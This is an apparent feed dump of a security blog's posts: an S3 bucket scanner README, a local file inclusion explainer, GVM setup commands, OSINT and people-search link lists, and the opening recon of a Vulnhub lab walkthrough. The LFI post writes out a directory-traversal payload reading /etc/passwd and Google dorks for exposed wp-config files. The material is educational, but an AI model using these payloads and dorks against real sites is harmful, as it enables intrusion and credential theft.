&lt;/ul&gt;</content><author><name>Humberto Jr (bt0)</name><email>bt0@tutanota.com</email></author><category term="infosec" /><category term="pentest" /><category term="BugBounty" /><category term="tools" /><summary type="html">Hello, this is our first alphabeta test version of BugBuntu</summary></entry><entry><title type="html">SSS3 - Simple Storage Scanner (Tool)</title><link href="https://humbertojunior.com.br/infosec/pentest/bugbounty/tools/2021/11/08/sss3-simple-storage-scanner.html" rel="alternate" type="text/html" title="SSS3 - Simple Storage Scanner (Tool)" /><published>2021-11-08T00:00:00-03:00</published><updated>2021-11-08T00:00:00-03:00</updated><id>https://humbertojunior.com.br/infosec/pentest/bugbounty/tools/2021/11/08/sss3-simple-storage-scanner</id><content type="html" xml:base="https://humbertojunior.com.br/infosec/pentest/bugbounty/tools/2021/11/08/sss3-simple-storage-scanner.html">&lt;p&gt;SSS3 is a simple S3 Bucket testing software. It uses aws cli to search for public buckets in a list of domains/subdomains.&lt;/p&gt;

&lt;h1 id=&quot;sss3&quot;&gt;SSS3&lt;/h1&gt;
&lt;h2 id=&quot;simple-storage-scanner&quot;&gt;&lt;em&gt;Simple Storage Scanner&lt;/em&gt;&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;http://www.gnu.org/licenses/gpl-3.0&quot;&gt;&lt;img src=&quot;https://img.shields.io/badge/License-GPL%20v3-blue.svg&quot; alt=&quot;License: GPL v3&quot; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2 id=&quot;basic-requirements&quot;&gt;Basic Requirements&lt;/h2&gt;

&lt;ul&gt;
  &lt;li&gt;It requires aws cli installed and configured with a s3 policy defined&lt;/li&gt;
  &lt;li&gt;You should have a list of previous enumerated domains/subdomains&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;features&quot;&gt;Features&lt;/h2&gt;

&lt;ul&gt;
  &lt;li&gt;Iterates a list of domains/subdomains&lt;/li&gt;
  &lt;li&gt;Tests if a domain/subdomain respond to a bucket and if its permissions for listing are enabled&lt;/li&gt;
  &lt;li&gt;Export the result of listing of buckets found&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;installation&quot;&gt;Installation&lt;/h2&gt;

&lt;p&gt;Clone the repository, give +x to script and be happy
SSS3 requires &lt;a href=&quot;https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2-linux.html&quot;&gt;AWS CLI&lt;/a&gt; to run.&lt;/p&gt;

&lt;div class=&quot;language-sh highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;git clone https://github.com/halencarjunior/sss3.git
&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;chmod&lt;/span&gt; +x sss3.sh
&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;./ss3.sh domain.txt &lt;span class=&quot;nt&quot;&gt;-o&lt;/span&gt; output.txt
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h2 id=&quot;usage-example&quot;&gt;Usage example&lt;/h2&gt;

&lt;p&gt;You could start enumerating a domain using &lt;a href=&quot;https://github.com/OWASP/Amass/blob/master/doc/user_guide.md&quot;&gt;Amass&lt;/a&gt;&lt;/p&gt;

&lt;div class=&quot;language-sh highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;amass enum &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; example.com &lt;span class=&quot;nt&quot;&gt;-o&lt;/span&gt; domains-example-com.txt
&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;./sss3.sh domains-example-com.txt &lt;span class=&quot;nt&quot;&gt;-o&lt;/span&gt; output-example-com.txt
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;a href=&quot;https://asciinema.org/a/uDBv5uQ60Mtlc868lsfWZAJ5O&quot;&gt;&lt;img src=&quot;https://asciinema.org/a/uDBv5uQ60Mtlc868lsfWZAJ5O.svg&quot; alt=&quot;asciicast&quot; /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2 id=&quot;development&quot;&gt;Development&lt;/h2&gt;

&lt;p&gt;Want to contribute? Great! Please send your PR for us and we’ll be greateful for your help.&lt;/p&gt;

&lt;h2 id=&quot;references&quot;&gt;References&lt;/h2&gt;

&lt;p&gt;I am grateful for some articles that motivated me to creat that tool&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://sidechannel.blog/enumerando-servicos-em-contas-aws-amazon-web-services-de-forma-anonima-e-nao-autenticada/index.html&quot;&gt;Sidechannel Article by Rodrigo Montoro&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://rhinosecuritylabs.com/penetration-testing/penetration-testing-aws-storage/&quot;&gt;Rhynosec Article for Pentesting S3&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Thanks for using and help to share please&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Free Software, Hell Yeah!&lt;/strong&gt;&lt;/p&gt;</content><author><name>Humberto Jr (bt0)</name><email>bt0@tutanota.com</email></author><category term="infosec" /><category term="pentest" /><category term="BugBounty" /><category term="tools" /><summary type="html">SSS3 is a simple S3 Bucket testing software. It uses aws cli to search for public buckets in a list of domains/subdomains.</summary></entry><entry><title type="html">LFI Parameters List</title><link href="https://humbertojunior.com.br/infosec/pentest/2021/02/16/lfi-parameters.html" rel="alternate" type="text/html" title="LFI Parameters List" /><published>2021-02-16T00:00:00-03:00</published><updated>2021-02-16T00:00:00-03:00</updated><id>https://humbertojunior.com.br/infosec/pentest/2021/02/16/lfi-parameters</id><content type="html" xml:base="https://humbertojunior.com.br/infosec/pentest/2021/02/16/lfi-parameters.html">&lt;h2 id=&quot;lfi-local-file-inclusion&quot;&gt;LFI (Local File Inclusion)&lt;/h2&gt;

&lt;p&gt;Local file inclusion (also known as LFI) is the process of including
files, that are already locally present on the server, through the
exploiting of vulnerable inclusion procedures implemented in the
application. This vulnerability occurs, for example, when a page
receives, as input, the path to the file that has to be included and
this input is not properly sanitized, allowing directory traversal
characters (such as dot-dot-slash) to be injected. Although most
examples point to vulnerable PHP scripts, we should keep in mind that it
is also common in other technologies such as JSP, ASP and others. [1]&lt;/p&gt;

&lt;p&gt;Example of test:&lt;/p&gt;

&lt;p&gt;Consider the URL&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt; http://vulnerable_host/preview.php?file=example.html
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;The parameter file= could be exploited to point it to another file
within the server&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt; http://vulnerable_host/preview.php?file=../../../../etc/passwd
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;The expected result is shown below:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt; root:x:0:0:root:/root:/bin/bash
 bin:x:1:1:bin:/bin:/sbin/nologin
 daemon:x:2:2:daemon:/sbin:/sbin/nologin
 alex:x:500:500:alex:/home/alex:/bin/bash
 margo:x:501:501::/home/margo:/bin/bash
 ...
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;There is a list of most common parameters to test for LFI&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt; ?cat=
 ?dir=
 ?action=
 ?board=
 ?date=
 ?detail=
 ?file=
 ?download=
 ?path=
 ?folder=
 ?prefix=
 ?include=
 ?page=
 ?inc=
 ?locate=
 ?show=
 ?doc=
 ?site=
 ?type=
 ?view=
 ?content=
 ?document=
 ?layout=
 ?mod=
 ?conf=
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;You can use Google Hacking and dorks to find vulnerable targets like:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt; inurl:&quot;wp-license.php?file=../..//wp-config&quot;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;File contain password and directory traversal vulnerability [2]&lt;/p&gt;

&lt;p&gt;Using the same strategy to exploit wordpress and retrieve the wp-config,
you could use all those parameters above and create your own Google
Hacking Dork to analyze your target.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt; inurl:&quot;?cat=&quot; site:&quot;example.com&quot; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;References:&lt;/p&gt;

&lt;p&gt;[1] &lt;a href=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion&quot;&gt;OWASP -
LFI&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;[2] &lt;a href=&quot;https://www.exploit-db.com/ghdb/4940&quot;&gt;GHDB&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Thanks for following!&lt;/p&gt;</content><author><name>Humberto Jr (bt0)</name><email>bt0@tutanota.com</email></author><category term="infosec" /><category term="pentest" /><summary type="html">LFI (Local File Inclusion)</summary></entry><entry><title type="html">Installing GVM on Kali Linux 2020</title><link href="https://humbertojunior.com.br/tools/2021/01/22/installing-gvm-kali-linux.html" rel="alternate" type="text/html" title="Installing GVM on Kali Linux 2020" /><published>2021-01-22T00:00:00-03:00</published><updated>2021-01-22T00:00:00-03:00</updated><id>https://humbertojunior.com.br/tools/2021/01/22/installing-gvm-kali-linux</id><content type="html" xml:base="https://humbertojunior.com.br/tools/2021/01/22/installing-gvm-kali-linux.html">&lt;h2 id=&quot;greenbone-vulnerability-manager-old-openvas&quot;&gt;Greenbone Vulnerability Manager (Old OpenVAS)&lt;/h2&gt;

&lt;p&gt;Here is a list of commands to install GVM on Kali Linux 2020. I have
compiled the commands after tried to install using source code. So, Kali
Linux has the bin package to install it using apt.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt; sudo apt update &amp;amp;&amp;amp; apt upgrade
 sudo apt-get install gvm
 sudo runuser -u _gvm -- gvm-manage-certs -a -f
 sudo runuser -u _gvm -- gvmd –create-user=&amp;lt;UserName&amp;gt; –password=&amp;lt;Password&amp;gt;

 sudo systemctl enable redis-server@openvas.service
 sudo systemctl start redis-server@openvas.service

 sudo runuser -u _gvm -- greenbone-nvt-sync
 sudo runuser -u _gvm -- greenbone-feed-sync --type SCAP
 sudo runuser -u _gvm -- greenbone-feed-sync --type CERT
 sudo runuser -u postgres -- /usr/share/gvm/create-postgresql-database
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;verifying-the-setup&quot;&gt;Verifying the setup&lt;/h3&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt; sudo gvm-check-setup 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;starting-the-setup&quot;&gt;Starting the setup&lt;/h3&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt; sudo gvm-setup

 sudo gvm-feed-update
 sudo runuser -u _gvm -- greenbone-nvt-sync
 sudo runuser -u _gvm -- greenbone-scapdata-sync
 sudo runuser -u _gvm -- greenbone-nvt-sync
 sudo systemctl enable /lib/systemd/system/greenbone-security-assistant.service
 sudo gvm-start
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Now you are able to access the admin page using: https://127.0.0.1:9332&lt;/p&gt;

&lt;p&gt;To change the listening IP you have to change the file
/lib/systemd/system/greenbone-security-assistant.service&lt;/p&gt;

&lt;p&gt;List of resources:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/greenbone/openvas/releases/&quot;&gt;Greenbone OpenVAS&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Thanks for following!&lt;/p&gt;</content><author><name>Humberto Jr (bt0)</name><email>bt0@tutanota.com</email></author><category term="tools" /><summary type="html">Greenbone Vulnerability Manager (Old OpenVAS)</summary></entry><entry><title type="html">OSINT - Some Repositories and Tools</title><link href="https://humbertojunior.com.br/infosec/osint/2020/02/11/osint-repository.html" rel="alternate" type="text/html" title="OSINT - Some Repositories and Tools" /><published>2020-02-11T00:00:00-03:00</published><updated>2020-02-11T00:00:00-03:00</updated><id>https://humbertojunior.com.br/infosec/osint/2020/02/11/osint-repository</id><content type="html" xml:base="https://humbertojunior.com.br/infosec/osint/2020/02/11/osint-repository.html">&lt;h2 id=&quot;osint&quot;&gt;OSINT&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Open-source intelligence&lt;/strong&gt; (OSINT) is data collected from publicly
available sources to be used in an intelligence context.In the
intelligence community, the term “open” refers to overt, publicly
available sources (as opposed to covert or clandestine sources). It is
not related to open-source software or collective intelligence.&lt;/p&gt;

&lt;p&gt;OSINT under one name or another has been around for hundreds of years.
With the advent of instant communications and rapid information
transfer, a great deal of actionable and predictive intelligence can now
be obtained from public, unclassified sources.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://en.wikipedia.org/wiki/Open-source_intelligence&quot;&gt;Wikipedia Link&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;List of resources:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;http://ewasion.github.io/opendirectory-finder/&quot;&gt;Open Direcroty Finder&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://eyeofjustice.com/od/&quot;&gt;Eye of Justice&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://rsch.neocities.org/gen2/filer.html&quot;&gt;Filer&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://lumpysoft.com&quot;&gt;Lumpy Soft&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://open-directories.reecemercer.dev&quot;&gt;Open Directories&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://snowfl.com&quot;&gt;SnowFL&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://opendirectorysearch.tk&quot;&gt;Open Directory Search&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://lendx.org&quot;&gt;Lendx&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://sites.google.com/view/l33tech/tools/ods&quot;&gt;l33tech ODS&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;a href=&quot;http://palined.com/search/&quot;&gt;Palined Search&lt;/a&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://censys.io&quot;&gt;Censys&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://shodan.io&quot;&gt;Shodan&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://viz.greynoise.io/table&quot;&gt;Viz&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://zoomeye.org&quot;&gt;ZoomEye&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://fofa.so&quot;&gt;Fofa&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://onyphe.io&quot;&gt;Onyphe&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://app.binaryedge.io&quot;&gt;BinaryEdge&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://hunter.io&quot;&gt;Hunter IO&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://wigle.net&quot;&gt;Wigle&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://Lampire.io&quot;&gt;Lampire&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;people-search&quot;&gt;People Search&lt;/h3&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://thatsthem.com&quot;&gt;Thats Them&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://www.lullar.com&quot;&gt;Lullar&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://www.yasni.com&quot;&gt;Yasni&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.zabasearch.com&quot;&gt;ZabaSearch&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://webmii.com&quot;&gt;Webmii&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://www.ipeople.com&quot;&gt;iPeople&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://truepeoplesearch.com&quot;&gt;True People Search&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://findpeoplesearch.com&quot;&gt;Find People Search&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://anywho.com&quot;&gt;Anywho&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://johndoe.com&quot;&gt;JohDoe&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://cvgadget.com&quot;&gt;CV Gadget&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://w3.telephonedirectories.us/People-Search&quot;&gt;Telephone Dir&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.mylife.com/people-search/&quot;&gt;MyLife PPL Search&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;username-search-tools&quot;&gt;Username Search Tools&lt;/h2&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://peekyou.com&quot;&gt;PeekYou&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://searchpof.com&quot;&gt;SearchPof&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://knowem.com&quot;&gt;Knowem&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://namechk.com&quot;&gt;Namechk&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.snapdex.com&quot;&gt;Snapdex&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://getpeoplesearch.com/username&quot;&gt;GetPeopleSearch&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://uk.match.com&quot;&gt;Match UK&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://lullar-com-3.appspot.com&quot;&gt;Lullar&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://checkusernames.com&quot;&gt;Check Usernames&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.namecheckr.com&quot;&gt;Namecheckr&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://usersherlock.com&quot;&gt;User Sherlock&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;http://instantusername.com&quot;&gt;Instant Username&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://usersearch.org&quot;&gt;Usersearch&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Thanks for following! &lt;em&gt;To be updated&lt;/em&gt;&lt;/p&gt;</content><author><name>Humberto Jr (bt0)</name><email>bt0@tutanota.com</email></author><category term="infosec" /><category term="osint" /><summary type="html">OSINT</summary></entry><entry><title type="html">Writeup - Vulnhub machine - Five86-1</title><link href="https://humbertojunior.com.br/infosec/pentest/writeup/2020/01/29/writeup-vulnhub-five86-1.html" rel="alternate" type="text/html" title="Writeup - Vulnhub machine - Five86-1" /><published>2020-01-29T00:00:00-03:00</published><updated>2020-01-29T00:00:00-03:00</updated><id>https://humbertojunior.com.br/infosec/pentest/writeup/2020/01/29/writeup-vulnhub-five86-1</id><content type="html" xml:base="https://humbertojunior.com.br/infosec/pentest/writeup/2020/01/29/writeup-vulnhub-five86-1.html">&lt;p&gt;Hi guys,&lt;/p&gt;

&lt;p&gt;Today i am posting my first try to write a walkthrough of a OSCP like
machine that i’ve download in vulnhub project. i’ve chosen that machine
because it’s intended to be a beginner’s challenge and it helps a lot to
understand how Capture the Flag competitions are made.&lt;/p&gt;

&lt;h2 id=&quot;vulnhub&quot;&gt;Vulnhub&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Aim/Goal&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;To provide materials that allow anyone to gain practical ‘hands-on’
experience in digital security, computer software &amp;amp; network
administration.&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.vulnhub.com/&quot;&gt;Vunlnhub Site&lt;/a&gt;&lt;/p&gt;

&lt;h2 id=&quot;about-our-target-machine&quot;&gt;About our target machine&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Five86-1 is another purposely built vulnerable lab with the intent of
gaining experience in the world of penetration testing.&lt;/p&gt;

&lt;p&gt;The ultimate goal of this challenge is to get root and to read the one
and only flag.&lt;/p&gt;

&lt;p&gt;Linux skills and familiarity with the Linux command line are a must, as
is some experience with basic penetration testing tools.&lt;/p&gt;

&lt;p&gt;For beginners, Google can be of great assistance, but you can always
tweet me at @DCAU7 for assistance to get you going again. But take note:
I won’t give you the answer, instead, I’ll give you an idea about how to
move forward. Technical Information&lt;/p&gt;

&lt;p&gt;Five86-1 is a VirtualBox VM built on Debian 64 bit, but there shouldn’t
be any issues running it on most PCs.&lt;/p&gt;

&lt;p&gt;Five86-1 has been tested successfully on VMWare Player, but if there are
any issues running this VM in VMware, have a read through of this.&lt;/p&gt;

&lt;p&gt;It is currently configured for Bridged Networking, however, this can be
changed to suit your requirements. Networking is configured for DHCP.&lt;/p&gt;

&lt;p&gt;Installation is simple - download it, unzip it, and then import it into
VirtualBox or VMWare and away you go.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Important&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;While there should be no problems using this VM, by downloading it, you
accept full responsibility for any unintentional damage that this VM may
cause.&lt;/p&gt;

&lt;p&gt;In saying that, there shouldn’t be any problems, but I feel the need to
throw this out there just in case.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Credits&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A big thanks goes out to the members of @m0tl3ycr3w.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Contact&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I’m also very interested in hearing how people go about solving these
challenges, so if you’re up for writing a walkthrough, please do so and
send me a link, or alternatively, follow me on Twitter, and DM me (you
can unfollow after you’ve DM’d me if you’d prefer).&lt;/p&gt;

&lt;p&gt;I can be contacted via Twitter - @Five86_x&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/five86-1,417/&quot;&gt;Download Five86-1 VM&lt;/a&gt;&lt;/p&gt;

&lt;h2 id=&quot;tools-and-blogs&quot;&gt;Tools and Blogs&lt;/h2&gt;

&lt;p&gt;I am using Kali Linux 2019.4 and the new Kali Undercover theme (just to
be fashionable lol!)&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://www.kali.org/wp-content/uploads/2019/11/kali-undercover-1.gif&quot; alt=&quot;KaliUndercover&quot; /&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;Netdiscover&lt;/li&gt;
  &lt;li&gt;Nmap&lt;/li&gt;
  &lt;li&gt;Nikto&lt;/li&gt;
  &lt;li&gt;Crunch&lt;/li&gt;
  &lt;li&gt;Hashcat&lt;/li&gt;
  &lt;li&gt;Metasploit&lt;/li&gt;
  &lt;li&gt;GTFO Bins&lt;/li&gt;
  &lt;li&gt;Rebootuser Blog&lt;/li&gt;
  &lt;li&gt;Virtualbox (for labs)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Post Exploitation List
https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List&lt;/p&gt;

&lt;h2 id=&quot;recon&quot;&gt;Recon&lt;/h2&gt;

&lt;p&gt;After download and import the VM (i am using Virtualbox), everything
configured to run inside the virtualbox private network.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/00a-virtualbox-network.png&quot; alt=&quot;VirtualboxNetwork&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The network configured in Host-only Adapter is 192.168.56.0/24 and the
DHCP is enabled.&lt;/p&gt;

&lt;p&gt;First step is to discover which IP address our target VM got after boot.
We will do that using the netdiscover tool.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ netdiscover -i eth1 -r 192.168.56.0/24

-i = interface (using eth1 because my kali linux has two interfaces and eth1 is the Host-only adapter)
-r = range
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/00-netdiscover.png&quot; alt=&quot;Netdiscover&quot; /&gt;&lt;/p&gt;

&lt;p&gt;We can realize that target VM is 192.168.56.15 since the two other IPs
are our hypervisor default addresses. Our Kali Linux machine got
192.168.56.9&lt;/p&gt;

&lt;p&gt;The next step is to try to discover which services are running on our
target. We can do this type of scan using nmap.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ nmap -sC -sV -sT 192.168.56.15
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/01-nmap-recon.png&quot; alt=&quot;NmapRecon&quot; /&gt;&lt;/p&gt;

&lt;p&gt;At this point we have information about a SSH server in port 22, a
webserver in port 80 with robots.txt and a disallowed entry to /ona
directory (interesting!) and port 10000 running a Webmin version 1.9.20
service.&lt;/p&gt;

&lt;p&gt;We can try to pull more details running nikto in port 80.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;$ nikto -host 192.168.56.15
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/02-nikto-recon.png&quot; alt=&quot;Nikto&quot; /&gt;&lt;/p&gt;

&lt;p&gt;As we can see, nothing new about our target after nikto results.&lt;/p&gt;

&lt;p&gt;Let’s try to search for some more information about our services
versions that we got using google and exploit-db.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/03-exploit-db.png&quot; alt=&quot;Exploit-db&quot; /&gt;&lt;/p&gt;

&lt;p&gt;The first search points to a Webmin vulnerability in version 1.9.20 that
brings to an unauthenticated RCE. The exploit is also a Metasploit
module that does things easier to exploit. The only exception is:&lt;/p&gt;

&lt;p&gt;&lt;em&gt;This module exploits a backdoor in Webmin versions 1.890 through 1.920.
Only the SourceForge downloads were backdoored, but they are listed as
official downloads on the project’s site.&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/writeupfive86-1/04-webmin-login.png&quot; alt=&quot;WebminLogin&quot; /&gt;&lt;/p&gt;

&lt;p&gt;So, the exploit author says the module only works on versions downloaded
from sourceforge. It should be a problem if our version were downloaded
from apt source or another official not backdoored source. Actually,
i’ve tested after finding this information and exploit didn’t work,
confirming probably the version is not backdoored.&lt;/p&gt;

&lt;p&gt;Let’s move on!&lt;/p&gt;

&lt;p&gt;As we’ve saw before we have a robots.txt with some restrictions in its
configuration. The robots config prevents /ona directory being
discovered. Browsing to the /ona path we can see a web application
running.&lt;/p&gt;

